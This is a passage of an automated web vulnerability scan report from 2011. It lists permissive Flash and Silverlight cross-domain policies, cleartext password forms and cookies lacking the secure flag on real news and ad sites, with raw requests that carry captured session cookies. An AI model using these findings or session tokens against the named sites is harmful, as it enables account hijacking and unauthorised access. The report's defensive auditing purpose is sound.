Host: www.npr.org

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:46 GMT
Server: Apache/2.2.14 (Unix)
Last-Modified: Thu, 07 Apr 2011 20:17:23 GMT
Accept-Ranges: bytes
Content-Length: 455
Cache-Control: max-age=600
Expires: Mon, 09 May 2011 15:49:46 GMT
Keep-Alive: timeout=10, max=4945
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.threespot.com"/>
   <allow-access-from domain="*.npr.org" />
   <allow-access-from domain="*.digitaria.com"/>
   <allow-access-from domain="www.kqed.org" />
   <allow-access-from domain="*.iheartnpr.org" />
   <allow-access-from domain="apps.facebook.com" />
...[SNIP]...

3.80. http://www.usatoday.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
Accept-Ranges: bytes
ETag: "befaf11117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:43 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

3.81. http://api.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:41 GMT
Server: hi
Status: 200 OK
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Content-Type: application/xml
Content-Length: 561
Set-Cookie: k=173.193.214.243.1304955581869571; path=/; expires=Mon, 16-May-11 15:39:41 GMT; domain=.twitter.com
Cache-Control: max-age=1800
Expires: Mon, 09 May 2011 16:09:41 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4. Silverlight cross-domain policy  previous  next
There are 16 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 09 May 2011 15:35:02 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.2. http://ads.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:11e6"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:35:08 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

4.3. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 15:34:58 GMT
Date: Mon, 09 May 2011 15:34:58 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.4. http://b.voicefive.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 15:35:23 GMT
Date: Mon, 09 May 2011 15:35:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.5. http://content.usatoday.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:09 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

4.6. http://contextweb.usatoday.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://contextweb.usatoday.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: contextweb.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 730
Date: Mon, 09 May 2011 15:36:35 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

4.7. http://data.usatoday.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.usatoday.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: data.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 730
Date: Mon, 09 May 2011 15:37:58 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

4.8. http://i.usatoday.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.usatoday.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: i.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 730
Date: Mon, 09 May 2011 15:36:39 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

4.9. http://metrics.csmonitor.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.csmonitor.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.csmonitor.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:20 GMT
Server: Omniture DC/2.0.0
xserver: www96
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.10. http://metrics.npr.org/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.npr.org
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.npr.org

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:57 GMT
Server: Omniture DC/2.0.0
xserver: www391
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.11. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 09 May 2011 14:23:30 GMT
Expires: Fri, 06 May 2011 14:23:11 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 4295
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.12. http://secure-us.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:19 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 15:35:19 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

4.13. http://spd.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spd.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spd.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:128b"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:39:55 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

4.14. http://speed.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:35:10 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

4.15. http://usatoday1.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:51 GMT
Server: Omniture DC/2.0.0
xserver: www653
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.16. http://www.usatoday.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:43 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

5. Cleartext submission of password  previous  next
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://www.therepublic.com/login/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /login/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login/ HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FreakAuth=423b87089976e0474ec7fcf078c4204a; __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html
Content-Length: 24003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Republic -
...[SNIP]...
</p>
<form id="login" method="post" action="./login/process/">
   <p>
...[SNIP]...
</span><input type="password" name="login_password" id="login_password" size="30"/>&nbsp<a href="./login/forgot/">
...[SNIP]...

5.2. http://www.therepublic.com/login/register/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /login/register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /login/register/ HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 25776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Republic -
...[SNIP]...
</p>
<form id="login" method="post" action="./login/reg_step1_sub/">
   <p>
...[SNIP]...
</span><input type="password" name="login_password" id="login_password" size="30"/></p>
...[SNIP]...
</span><input type="password" name="login_password_rep" id="login_password_rep" size="30"/></p>
...[SNIP]...

6. SSL cookie without secure flag set  previous  next
There are 7 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


6.1. https://shop.npr.org/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.npr.org
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?pcsid=dd4agnd4un1d3jrdith74nh772&p=one_page_checkout&start=1 HTTP/1.1
Host: shop.npr.org
Connection: keep-alive
Referer: http://shop.npr.org/index.php?p=cart
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; s_cc=true; s_sq=nprorg%3D%2526pid%253DCommunity%25253ANPR.org%252520Registration%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%2525280%252529%25253B%2526ot%253DA; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.7.10.1304955581

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:43:58 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; expires=Tue, 10-May-2011 01:43:58 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 65651

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...

6.2. https://www.groupon.com/dallas/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /dallas/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dallas/ HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

